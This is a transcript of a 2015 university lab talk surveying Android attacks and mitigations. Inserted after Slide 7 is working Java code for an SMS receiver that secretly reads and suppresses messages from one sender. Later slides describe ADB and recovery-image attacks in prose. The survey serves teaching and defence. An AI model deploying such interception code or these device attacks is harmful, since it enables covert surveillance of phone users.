All Your Droid Are Belong To Us: A Survey of Current Android Attacks

Dankook University, Computer Security & OS Lab. Presented by 김낙영 (Kim Nak-young), 2015. 04. 21

TRANSCRIPT

  • Slide 1: All Your Droid Are Belong To Us: A Survey of Current Android Attacks (Computer Security & OS Lab, 2015. 04. 21)
  • Slide 2: Contents
    - Introduction
    - Android Security Model
    - Android Security Model Analysis
    - Attack Classes
    - Mitigations
    - Conclusion
  • Slide 3: Introduction
    - Today's smartphone has as much processing power and memory as a high-end laptop computer.
    - Smartphones are always-on devices connected to the phone network and carrying GPS and other location services.
    - A mobile OS shared across many devices makes management more efficient, but the same uniformity makes large-scale attacks worthwhile.
    - This talk introduces the current Android security model, the attacks against it, and possible mitigations.
  • Slide 4: Android Security Model
    - Android is a Linux-based operating system with a layered structure of services: core native libraries (C) and an application framework (Java).
    - Permission model: an application must hold the corresponding permission before it may request a system resource.
    - Each application is sandboxed by the kernel: every application runs under its own UID, so one application cannot access another application's private storage.
    - An application can still use another application's resources through IPC (Intents).
  • Slide 5: Android Security Model: install-time confirmation
    - Before an application is installed, the user is presented with a list of all the permissions it requests.
    - Most users find this list difficult to understand; the IPC mechanism behind it is harder still.
    - The system offers only two choices: accept every requested permission and install, or refuse and do not install.
  • Slide 6: Android Security Model: the Android Market
    - Applications in the Android Market are self-signed: the market does not employ any kind of central signing authority, unlike Apple's App Store.
    - This open policy is attractive to attackers.
  • Slide 7: Android Security Model Analysis: application model
    - An incoming SMS event causes a broadcast to be sent system-wide.
    - Applications can register to take action when that broadcast is observed, and can assign themselves a priority for receiving it.
    - A receiver with a high enough priority can therefore consume the broadcast and prevent it from reaching lower-priority receivers.
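An added illustration of the mechanism on this slide (example code written for this transcript, not code from the presentation or from the surveyed paper): a manifest-registered receiver with a high android:priority that reads the incoming message and aborts the ordered SMS broadcast so that lower-priority receivers never see it. The package name, the receiver class name, and the TARGET_SENDER number are assumptions made for the example.

```java
// Added example: a BroadcastReceiver that wins the ordered SMS_RECEIVED broadcast
// and swallows messages from one sender. Not from the slides or the surveyed paper.
//
// AndroidManifest.xml (package name com.example.smsgrab is assumed):
//   <uses-permission android:name="android.permission.RECEIVE_SMS" />
//   <application ...>
//     <receiver android:name=".SmsInterceptor">
//       <!-- Below the system ceiling of 1000 but above any ordinary app receiver -->
//       <intent-filter android:priority="999">
//         <action android:name="android.provider.Telephony.SMS_RECEIVED" />
//       </intent-filter>
//     </receiver>
//   </application>

package com.example.smsgrab;

import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.os.Bundle;
import android.telephony.SmsMessage;
import android.util.Log;

public class SmsInterceptor extends BroadcastReceiver {
    private static final String TAG = "SmsInterceptor";
    // Hypothetical trigger: only messages from this number are hidden from the user.
    private static final String TARGET_SENDER = "+15555550100";

    @Override
    public void onReceive(Context context, Intent intent) {
        Bundle extras = intent.getExtras();
        if (extras == null) {
            return;
        }
        // The platform delivers the raw PDUs of the incoming message(s) under "pdus".
        Object[] pdus = (Object[]) extras.get("pdus");
        if (pdus == null) {
            return;
        }
        for (Object pdu : pdus) {
            SmsMessage msg = SmsMessage.createFromPdu((byte[]) pdu);
            String sender = msg.getOriginatingAddress();
            String body = msg.getMessageBody();
            if (TARGET_SENDER.equals(sender)) {
                Log.d(TAG, "captured from " + sender + ": " + body);
                // SMS_RECEIVED is an ordered broadcast: aborting it here stops delivery
                // to every lower-priority receiver, including the messaging application,
                // so the user gets no notification that a message arrived.
                abortBroadcast();
                return;
            }
        }
        // Messages from anyone else pass through untouched, which keeps the receiver
        // inconspicuous.
    }
}
```

Two practical caveats. First, the RECEIVE_SMS permission appears in the install-time permission list, which ties this back to the previous slide: the user is told, but is unlikely to understand what granting it allows. Second, this interception works on the Android versions the surveyed paper covers; from Android 4.4 onward only the user's default SMS application receives the deliverable SMS intent and other applications can no longer abort SMS_RECEIVED, so the same manifest no longer hides the message.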
  • Slide 8: Android Security Model Analysis: patch cycle
  • Slide 9: Android Security Model Analysis: trusted USB connections, recovery, privilege separation
    - Trusted USB connections: ADB bypasses the Android Market for installing and uninstalling applications and gives an unprivileged remote shell; an attacker can use it to run tools that exploit a local vulnerability.
    - Recovery mode and boot process: an attacker can replace the recovery image with a malicious one and thereby gain privileged access to the user's information.
    - Uniform privilege separation: security applications such as anti-virus are limited by the same sandbox as everything else; an AV product would need root privilege to actually block malware, spyware and phishing apps.
  • Slide 10: Attack Classes
    - No physical access: remote attacks rely heavily on social engineering (e.g., phishing, pharming); the attacker must get some malicious software onto the device in order to run code on it remotely.
    - Physical access with ADB enabled: a password or screen lock does not stop the attacker, because the device can be exploited through ADB.
    - Physical access without ADB enabled: the ADB service is unavailable, so the attacker loads malicious code via recovery mode instead.
    - Physical access to an unobstructed device (no password or screen lock): the attacker can enable ADB, install a malicious application, and so on.
  • Slide 11: Unprivileged Attacks
    - The user installs an application from the internet; it is sandboxed, but it can access system resources through the permissions it was granted.
    - Trojan applications have been found in the legitimate Android Market.
    - A malicious application can run in the background with a registered intent, waiting for an event to act on.
    - A malicious application can use a legitimate API to disable the screen lock.
    - Application repackaging: a legitimate application is modified and re-uploaded to the Android Market for download.
  • Slide 12: Remote Exploitation
    - Oberheide's seemingly benign application routinely made remote requests for new payloads to execute.
    - Privilege escalation: Linux kernel exploits are adaptable to the Android OS.
    - The slow patch cycle maximizes the window in which such exploits keep working.
  • Slide 13: Physical Access without ADB Enabled
    - Attackers target recovery mode: generate a customized recovery image whose init.rc and default.prop have been modified.
    - The modified init.rc runs malicious code, such as a rootkit, and gives a planted su executable its execute rights.
    - The modified default.prop switches the ADB state from disabled to enabled, so the attacker regains the ADB path on the next boot.
    - Physical access to an unobstructed device: all of the above methods apply.
  • Slide 14: Mitigations
    - Reduce the patch cycle length: separate Google's core patches from the manufacturers' patches.
    - Privileged applications: change the permission hierarchy so that security applications can act with elevated rights.
    - Leverage existing security technologies: adapt SELinux; TaintDroid.
    - Authenticated downloads, as in Apple's App Store.
    - Authenticated ADB.
    - Trusted Platform Module.
  • Slide 15: Conclusion
  • Slide 16: References
    - http://developer.android.com/guide/topics/manifest/intent-filter-element.html
    - http://ko.wikipedia.org/wiki/ _ _